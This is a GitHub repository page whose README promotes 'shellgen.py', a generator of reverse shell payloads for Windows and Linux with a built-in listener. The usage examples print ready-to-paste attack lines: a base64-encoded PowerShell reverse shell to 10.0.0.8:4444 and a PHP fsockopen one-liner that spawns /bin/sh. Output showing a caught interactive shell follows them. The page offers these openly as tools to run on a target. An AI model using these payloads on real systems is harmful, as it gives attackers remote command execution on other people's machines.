Skip to content

RikunjSindhwad/exploitscirpt

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 

Repository files navigation

exploitscirpts

General Scripts for exploitations....will keepp adding new

shellgen.py

  • reverse shell payload generator for windows/linux with interactive Listener and TTY. (better than nc)

Why to choose ?

  • Saves time for finding payloads.
  • Easy to use.
  • Interactive Shell for windows (partial)
  • TTY by default in linux. (saves time)
  • Easy to understand code so you can modify according to your need.

Examples ?

python3 final.py -h                          
usage: final.py [-h] -i IP -p PORT [-l] [-t TARGET]

Reverse Shellcode Generator with interactive & PTY Listner by Mr.r0b07

optional arguments:
  -h, --help  show this help message and exit
  -i IP       Attacker Machine IP
  -p PORT     Attacker Port to Listen
  -l          Start Listner Also
  -t TARGET   Target Payload [ powershell || php || python || ruby || perl || netcat ]
python3 final.py -i 10.0.0.8 -p 4444 -t powershell
Copy and paste below command to the target



[*] powershell reverse Shell 

    powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMAAuADAALgA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==


Thanks For using this 
python3 final.py -i 10.0.0.8 -p 4444 -t php -l
Copy and paste below command to the target



[*] PHP reverse Shell 

    php -r '$sock=fsockopen("10.0.0.8",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
[+] Trying to bind to 0.0.0.0 on port 4444: Done
[+] Waiting for connections on 0.0.0.0:4444: Got connection from 10.0.0.8 on port 41018
[*] Switching to interactive mode
$ export TERM=xterm
$ $ echo $TERM
echo $TERM
xterm
$  

About

General Scripts

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages